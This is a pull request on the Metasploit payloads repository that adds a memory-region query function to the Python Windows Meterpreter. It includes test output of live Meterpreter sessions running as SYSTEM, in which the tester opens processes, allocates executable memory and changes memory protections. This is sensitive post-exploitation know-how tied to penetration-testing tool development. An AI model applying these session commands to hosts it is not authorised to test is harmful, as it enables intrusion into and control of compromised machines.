add stdapi_sys_process_memory_query function to python windows meterp…
rapid7/metasploit-payloads pull request #645
Opened 2023-05-09 20:15 UTC by NtAlexio2

This PR implements `stdapi_sys_process_memory_query` function for python meterpreter. By this api you can query basic information of specific memory region.

Tested with:

- Python 3.7.2

Sample output:
```
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.22:4444 
[*] Sending stage (24772 bytes) to 10.0.0.2
[*] Meterpreter session 9 opened (10.0.0.22:4444 -> 10.0.0.2:49846) at 2023-05-09 16:08:07 -0400

meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc = sys.process.open(4384)
=> #<#<Class:0x00007fd60a4d8040>:0x00007fd609823548
 @aliases=
  {"image"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Image:0x00007fd6098233e0 @process=#<#<Class:0x00007fd60a4d8040>:0x00007fd609823548 ...>>,
   "io"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::IO:0x00007fd609823390 @process=#<#<Class:0x00007fd60a4d8040>:0x00007fd609823548 ...>>,
   "memory"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Memory:0x00007fd609823340 @process=#<#<Class:0x00007fd60a4d8040>:0x00007fd609823548 ...>>,
   "thread"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread:0x00007fd6098232f0 @process=#<#<Class:0x00007fd60a4d8040>:0x00007fd609823548 ...>>},
 @channel=nil,
 @client=#<Session:meterpreter 10.0.0.2:49846 (10.0.0.2) "NT AUTHORITY\SYSTEM @ DESKTOP-5HNNBGG">,
 @handle=712,
 @pid=4384>
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.query(0)
=> {"BaseAddress"=>nil, "AllocationBase"=>nil, "AllocationProtect"=>2, "RegionSize"=>nil, "Protect"=>2}
[3] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.query(0x7ffe0000)
=> {"BaseAddress"=>2147352576, "AllocationBase"=>2147352576, "AllocationProtect"=>1, "RegionSize"=>4096, "Available"=>false, "Protect"=>1, "PrivateMapping"=>true}
[4] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.query(0x54d0a00000)
=> {"BaseAddress"=>364277399552, "AllocationBase"=>364277399552, "AllocationProtect"=>2, "RegionSize"=>1273856, "Reserved"=>true, "Protect"=>nil, "PrivateMapping"=>true}
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> 
```

2023-05-09 21:21 UTC, smcintyre-r7 commented
@msjenkins-r7 test this please.

2023-05-11 14:28 UTC, smcintyre-r7 requested changes

2023-05-12 13:19 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2023-05-15 19:30 UTC, smcintyre-r7 commented
Looks correct to me now with those changes in place. Thanks @NtAlexio2 !

```
meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc = sys.process.open(sys.process.getpid)
=> #<#<Class:0x00000000091d8fb8>:0x00007ffb08007de0
 @aliases=
  {"image"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Image:0x00007ffb08007c50 @process=#<#<Class:0x00000000091d8fb8>:0x00007ffb08007de0 ...>>,
   "io"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::IO:0x00007ffb08007b88 @process=#<#<Class:0x00000000091d8fb8>:0x00007ffb08007de0 ...>>,
   "memory"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Memory:0x00007ffb08007ac0 @process=#<#<Class:0x00000000091d8fb8>:0x00007ffb08007de0 ...>>,
   "thread"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread:0x00007ffb080079f8 @process=#<#<Class:0x00000000091d8fb8>:0x00007ffb08007de0 ...>>},
 @channel=nil,
 @client=#<Session:meterpreter 192.168.159.10:65305 (192.168.159.10) "NT AUTHORITY\SYSTEM @ DC">,
 @handle=560,
 @pid=6572>
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> mem = proc.memory.allocate(0x1000)
=> 2304405864448
[3] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> sys.process.getpid
=> 6572
[4] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> mem.to_s(16)
=> "218894b0000"
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory
=> #<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Memory:0x00007ffb08007ac0
 @process=
  #<#<Class:0x00000000091d8fb8>:0x00007ffb08007de0
   @aliases=
    {"image"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Image:0x00007ffb08007c50 @process=#<#<Class:0x00000000091d8fb8>:0x00007ffb08007de0 ...>>,
     "io"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::IO:0x00007ffb08007b88 @process=#<#<Class:0x00000000091d8fb8>:0x00007ffb08007de0 ...>>,
     "memory"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Memory:0x00007ffb08007ac0 ...>,
     "thread"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread:0x00007ffb080079f8 @process=#<#<Class:0x00000000091d8fb8>:0x00007ffb08007de0 ...>>},
   @channel=nil,
   @client=#<Session:meterpreter 192.168.159.10:65305 (192.168.159.10) "NT AUTHORITY\SYSTEM @ DC">,
   @handle=560,
   @pid=6572>>
[6] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.query(mem)
=> {"BaseAddress"=>2304405864448, "AllocationBase"=>2304405864448, "AllocationProtect"=>7, "RegionSize"=>4096, "Available"=>false, "Protect"=>7, "PrivateMapping"=>true}
[7] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.query(0)
=> {"BaseAddress"=>0, "AllocationBase"=>0, "AllocationProtect"=>nil, "RegionSize"=>2147352576, "Available"=>true, "Protect"=>0}
[8] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.protect(mem, nil, PROT_READ | PROT_WRITE)
=> 7
[9] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.query(mem)
=> {"BaseAddress"=>2304405864448, "AllocationBase"=>2304405864448, "AllocationProtect"=>7, "RegionSize"=>4096, "Available"=>false, "Protect"=>2, "PrivateMapping"=>true}
[10] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> 
```

2023-05-15 19:32 UTC, merged